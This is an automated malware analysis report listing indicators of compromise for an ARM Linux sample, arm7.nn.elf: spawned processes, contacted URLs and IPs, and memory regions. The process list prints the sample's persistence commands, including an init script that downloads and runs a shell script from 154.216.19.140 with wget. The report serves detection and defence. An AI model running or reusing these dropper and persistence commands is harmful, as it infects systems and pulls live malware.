Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.6pdpbvSciu /tmp/tmp.MsKToqCd4o /tmp/tmp.pnJQh3yJzc

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.6pdpbvSciu /tmp/tmp.MsKToqCd4o /tmp/tmp.pnJQh3yJzc

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn.elf'\n /tmp/arm7.nn.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn.elf'\n killall arm7.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn.elf"

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "chmod +x /etc/init.d/arm7.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/arm7.nn.elf

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/arm7.nn.elf

/bin/sh

/bin/sh -c "ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/arm7.nn.elf /etc/rc.d/S99arm7.nn.elf

/tmp/arm7.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 42 hidden processes, click here to show them.

URLs

Name

Malicious

http://154.216.19.140/curl.sh

unknown

Details

Name:	http://154.216.19.140/curl.sh
TargetID:	16
From Memory:	true
Current Path:	/tmp/arm7.nn.elf
Source:	arm7.nn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/lol.sh

unknown

Details

Name:	http://154.216.19.140/lol.sh
TargetID:	16
From Memory:	true
Current Path:	/tmp/arm7.nn.elf
Source:	arm7.nn.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/

unknown

Details

Name:	http://154.216.19.140/
TargetID:	-1
From Memory:	true
Source:	arm7.nn.elf, inittab.16.dr, arm7.nn.elf.42.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr, mybinary.16.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

172.112.253.208

unknown

United States

27.239.143.156

unknown

Korea Republic of

162.64.49.51

unknown

United States

2.201.201.43

unknown

Germany

192.48.250.112

unknown

United States

9.78.191.157

unknown

United States

86.19.24.254

unknown

United Kingdom

16.186.201.11

unknown

United States

223.77.165.193

unknown

China

125.255.131.237

unknown

Japan

131.193.114.222

unknown

United States

62.97.97.13

unknown

Spain

147.35.128.110

unknown

United States

158.70.208.242

unknown

United States

171.192.61.161

unknown

United States

129.35.49.144

unknown

United States

8.200.176.23

unknown

United States

110.34.178.120

unknown

Thailand

49.254.102.119

unknown

Korea Republic of

96.158.231.158

unknown

United States

112.57.175.27

unknown

China

53.94.145.196

unknown

Germany

63.233.71.169

unknown

United States

154.12.219.231

unknown

United States

93.16.231.148

unknown

France

130.173.198.124

unknown

United States

49.80.187.40

unknown

China

19.126.168.106

unknown

United States

157.107.136.102

unknown

Japan

221.208.165.30

unknown

China

79.250.189.91

unknown

Germany

222.34.76.106

unknown

China

27.69.126.65

unknown

Viet Nam

107.31.26.108

unknown

United States

207.44.100.111

unknown

United States

222.217.63.230

unknown

China

114.142.142.177

unknown

India

105.34.36.56

unknown

Egypt

100.210.116.0

unknown

United States

139.87.184.76

unknown

United States

76.25.139.168

unknown

United States

119.200.29.157

unknown

Korea Republic of

210.152.122.182

unknown

Japan

73.71.90.170

unknown

United States

209.152.185.166

unknown

United States

128.37.55.76

unknown

United States

1.168.211.11

unknown

Taiwan; Republic of China (ROC)

78.245.167.244

unknown

France

29.177.144.67

unknown

United States

30.141.6.11

unknown

United States

18.106.66.209

unknown

United States

107.41.123.225

unknown

United States

156.228.180.116

unknown

Seychelles

167.245.160.21

unknown

United States

110.174.253.105

unknown

Australia

116.24.182.153

unknown

China

7.210.242.100

unknown

United States

114.156.125.169

unknown

Japan

142.110.46.211

unknown

Canada

220.74.252.165

unknown

Korea Republic of

155.162.50.37

unknown

United States

112.239.23.62

unknown

China

142.77.145.201

unknown

United States

122.253.193.89

unknown

Japan

193.143.1.59

unknown

91.192.158.43

unknown

Ukraine

52.96.223.135

unknown

United States

103.208.221.9

unknown

Japan

14.147.243.174

unknown

China

30.216.123.42

unknown

United States

44.52.114.173

unknown

United States

195.218.100.81

unknown

United Kingdom

187.37.131.26

unknown

Brazil

148.95.248.181

unknown

United States

176.135.216.89

unknown

France

221.146.149.176

unknown

Korea Republic of

173.53.99.161

unknown

United States

193.231.175.92

unknown

Romania

216.162.251.196

unknown

United States

43.224.123.163

unknown

New Zealand

78.20.95.118

unknown

Belgium

158.36.49.115

unknown

Norway

178.118.215.168

unknown

Belgium

179.66.77.159

unknown

Brazil

100.205.139.157

unknown

United States

201.166.76.4

unknown

Mexico

84.157.224.238

unknown

Germany

133.10.141.218

unknown

Japan

119.239.18.87

unknown

Japan

104.106.15.161

unknown

United States

138.39.2.130

unknown

United States

117.3.74.163

unknown

Viet Nam

201.166.228.51

unknown

Mexico

68.163.123.109

unknown

United States

1.54.54.155

unknown

Viet Nam

97.100.136.113

unknown

United States

21.106.205.76

unknown

United States

124.55.114.217

unknown

Korea Republic of

202.157.172.103

unknown

Singapore

88.146.106.127

unknown

Czech Republic

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7fda18036000

page execute read

5617196eb000

page read and write

56171cb3c000

page read and write

7fdb1e83c000

page read and write

7ffed4997000

page read and write

7fdb1f53a000

page read and write

7fdb1e034000

page read and write

7ffed49c8000

page execute read

7fdb1f02a000

page read and write

7fdb17fff000

page read and write

7fda18043000

page read and write

56171949a000

page execute read

56171b709000

page read and write

7fdb1eebe000

page read and write

56171b6f2000

page execute and read and write

7fdb1e8ce000

page read and write

7fdb1f3ed000

page read and write

7fdb1ec30000

page read and write

7fda1803e000

page read and write

5617196f4000

page read and write

7fdb1ee9b000

page read and write

7fdb1f516000

page read and write

7fdb1f20c000

page read and write

7fdb1f57f000

page read and write

7fdb18021000

page read and write

There are 15 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
arm7.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarm7.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
arm7.nn.elf